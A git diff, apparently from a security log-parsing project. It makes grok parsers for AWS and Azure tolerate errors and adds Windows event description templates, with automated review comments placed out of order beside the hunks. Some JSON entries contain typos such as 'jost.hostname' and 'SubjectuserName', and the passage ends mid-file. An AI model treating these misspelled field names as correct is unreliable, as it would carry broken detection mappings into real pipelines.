diff --git a/AWS/aws-cloudtrail/ingest/parser.yml b/AWS/aws-cloudtrail/ingest/parser.yml
index 265f9f7b7..31dcee72d 100644
--- a/AWS/aws-cloudtrail/ingest/parser.yml
+++ b/AWS/aws-cloudtrail/ingest/parser.yml
@@ -14,6 +14,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: json_event.message.sourceIPAddress
 output_field: source
 pattern: "(%{IP:ip}|%{HOSTNAME:domain})"
diff --git a/AWS/aws-guardduty/ingest/parser.yml b/AWS/aws-guardduty/ingest/parser.yml
index 06512d7b1..7cb4ac969 100644
--- a/AWS/aws-guardduty/ingest/parser.yml
+++ b/AWS/aws-guardduty/ingest/parser.yml
@@ -13,6 +13,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: json_event.message.type
 output_field: finding
 pattern: "%{DATA:threat_purpose}:%{DATA:affected_resource_type}/%{WORD:threat_family_name}(.%{DATA:detection_mecanism})?(!%{DATA:artifact})?"
diff --git a/Azure/azure-network-watcher/ingest/parser.yml b/Azure/azure-network-watcher/ingest/parser.yml
index edca894ef..f6af50849 100644
--- a/Azure/azure-network-watcher/ingest/parser.yml
+++ b/Azure/azure-network-watcher/ingest/parser.yml
@@ -9,6 +9,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{json_event.message.get('flow.0')}}"
 output_field: result
 pattern: "%{NUMBER:timestamp},%{IP:source_ip},%{IP:destination_ip},%{NUMBER:source_port},%{NUMBER:destination_port},%{PROTOCOL:protocol},%{TRAFFICFLOW:traffic_flow},%{TRAFFICDECISION:traffic_decision}(|,(%{FLOWSTATE:flow_state}|),(%{INT:source_packets}|),(%{INT:source_bytes}|),(%{INT:destination_packets}|),(%{INT:destination_bytes}|))"
diff --git a/Azure/azure-windows/ingest/parser.yml b/Azure/azure-windows/ingest/parser.yml
index 4a4e76ac7..bfd2e9740 100644
--- a/Azure/azure-windows/ingest/parser.yml
+++ b/Azure/azure-windows/ingest/parser.yml
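Review bot: With `raise_errors: false`, a `sourceIPAddress` that matches neither `IP` nor `HOSTNAME` now produces an event with no `source.ip`/`source.domain` and no error, so detection rules keyed on `source.ip` degrade silently instead of surfacing a parser failure; the new key deserves a comment stating which inputs it is meant to tolerate, e.g. `# sourceIPAddress is not always an address: calls made on behalf of an AWS service carry a service hostname or the literal "AWS Internal"`. If the pipeline offers it, also copy the unparsed raw value into a fallback field so the information is not dropped; whether such an option exists is not visible in this hunk. Note that the alternation is unanchored, so a value like `AWS Internal` will presumably match its leading `AWS` as a hostname rather than fail at all — a fixture for that value would pin whichever behaviour is intended.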
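Review bot: Suppressing grok errors here hides mis-parses of `type`, and the pattern on the next line has one: in grok the text outside `%{...}` is a regular expression, so the `.` before `%{DATA:detection_mecanism}` matches any character, and `%{WORD:threat_family_name}` stops at the first non-word character, so a real finding type such as `Backdoor:EC2/C&CActivity.B!DNS` would presumably yield `threat_family_name=C` and `detection_mecanism=CActivity.B` with nothing raised. Consider `(\\.%{DATA:detection_mecanism})?` (escaped inside the YAML double-quoted string) and a family-name capture that admits `&`, such as `(?<threat_family_name>[^.!]+)`, and add a comment above `raise_errors: false` noting that an unparsed type leaves the `finding.*` fields empty for downstream rules. The misspelling `detection_mecanism` is a pre-existing output field name; renaming it would break consumers, so leave it unless a migration is planned.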
@@ -24,6 +24,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parse_windows_event.message.EventData.SubjectUserName or parse_windows_event.message.EventData.User}}"
 output_field: result
 pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})"
@@ -36,6 +37,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{parse_windows_event.message.EventData.Hashes | lower}}"
 output_field: result
 value_sep: "="
diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json
index eb6a595a2..1d8547db9 100644
--- a/Beats/winlogbeat/_meta/smart-descriptions.json
+++ b/Beats/winlogbeat/_meta/smart-descriptions.json
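Review bot: The pattern two lines below ends in a `%{GREEDYDATA:user_name}` alternative, which matches any string including the empty one, so this grok cannot fail on content; the only failure `raise_errors: false` can suppress is presumably the case where neither `SubjectUserName` nor `User` is present and the template renders to nothing. That is worth stating above the new key so the next reader does not assume the pattern itself is fragile, e.g. `# pattern always matches; this only tolerates events that carry neither SubjectUserName nor User`. If the intent is instead to skip those events entirely, a presence filter on the step would be more explicit than a swallowed error.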
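Review bot: The `Hashes` field is presumably only populated on a subset of Windows events (Sysmon process-creation style records), so on every other event this step now silently does nothing rather than erroring; that trade-off should be recorded above the new key, e.g. `# EventData.Hashes is absent on most events; skip quietly instead of failing the whole event`. Also check what `{{ ... | lower}}` renders when `Hashes` is undefined — an empty string is harmless to `kv.parse-kv`, but the literal text `None` would be parsed as a key with no `=` and could leave a spurious entry in `result` with no error to flag it.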
@@ -1,34 +1,1631 @@ [ { - "value": "Auditing event on {winlog.computer_name}: {event.action}", + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4624 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetUserSid} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserSid", + "target": "host.hostname", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + 
"type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to log on to {host.hostname} from IP {source.ip} (LogonType {action.properties.LogonType})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "failed to log on to" + }, + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "connected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4625 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} logged off from {host.hostname}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "host.hostname", + "type": "logged off from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4634 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {action.properties.TargetServerName} using explicit credentials", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.TargetServerName", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} attempted to log on to {host.hostname} using explicit credentials", + "relationships": [ + { + "source": 
"action.properties.TargetUserName", + "target": "host.hostname", + "type": "attempted to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4648 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.TargetServerName", + "value": "localhost" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} accessed the object {action.properties.ObjectName} on {host.hostname}", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "action.properties.ObjectName", + "type": "accessed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4662 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special 
privileges", + "relationships": [ + { + "source": "action.properties.SubjectUserName", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed {process.command_line} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "user.name", + "target": "process.parent.executable", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "jost.hostname", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.executable", + "target": "host.hostname", + "type": "executed on" + }, + { + "source": "process.parent.executable", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4688 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Process {process.name} exited. 
It was executed by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.executable", + "type": "executed" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4689 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "created account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4720 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetDomainName", + "type": "enabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4722 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} changed their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "changed their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to change their password on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "host.hostname", + "type": "failed to change their password on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4723 + }, + { + "field": 
"winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} disabled account {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "disabled account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4725 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} deleted account {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "deleted account" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4726 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4727 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4742 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} created security-disabled 
local group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "created security-disabled local group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4744 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} effectuated changes about the security-disabled global group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "effectuated changes about" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4750 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} failed to authenticate from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to log authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} successfully authenticated from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "authenticated from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4768 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was denied a 
service ticket for {action.properties.ServiceName} from {source.ip} (Error Code: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was denied a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetDomainName}\\{action.properties.TargetUserName} was granted a service ticket for {action.properties.ServiceName} from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.ServiceName", + "type": "was granted a ticket for" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4769 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate from {source.ip}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "source.ip", + "type": "failed to authenticate from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4771 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{action.properties.TargetUserName} failed to authenticate on {action.properties.Workstation} (Reason: {action.properties.Status})", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "failed to log on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{action.properties.TargetUserName} 
successfully authenticated on {action.properties.Workstation}", + "relationships": [ + { + "source": "action.properties.TargetUserName", + "target": "action.properties.Workstation", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4776 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "success" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} 
from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + }, + { + "field": "host.hostname" + } + ] + 
}, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated local groups of {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated local groups of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4798 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} enumerated members of local group {action.properties.TargetUserName} on {log.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "enumerated members of" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4799 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "Authenticated user {user.name} was denied the access to Remote Desktop to {log.hostname} from IP {action.properties.ClientAddress}", + "relationships": [ + { + "source": "user.name", + "target": "log.hostname", + "type": "wad denied RDP access to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4825 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + 
"target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} accessed network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "accessed network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} failed to access network share {action.properties.ShareName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.ShareName", + "type": "failed to access network share" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5140 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was granted access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": 
"accessed shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} was denied access to {action.properties.ShareName}\\{action.properties.RelativeTargetName} from IP {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.RelativeTargetName", + "type": "failed to access shared file" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5145 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.outcome", + "value": "failure" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to 
{action.properties.DestAddress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4103 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.id} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "{user.domain}\\{user.name} executed PowerShell code on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4104 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Started invocation of PowerShell ScriptBlock on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 4105 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Completed invocation of PowerShell ScriptBlock on {host.name}", "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 4106 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-PowerShell" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + 
"target": "process.command_line", + "type": "executed" }, { - "field": "winlog.computer_name" + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" }, { - "field": "event.action" + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" } ] }, { - "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], "conditions": [ { - "field": "winlog.provider_guid", - "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + "field": "action.id", + "value": 1 }, { - "field": "winlog.computer_name" + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" }, { - "field": "winlog.SubjectUserSid" + "field": "process.executable" }, { - "field": "event.action" + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": 
"executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": 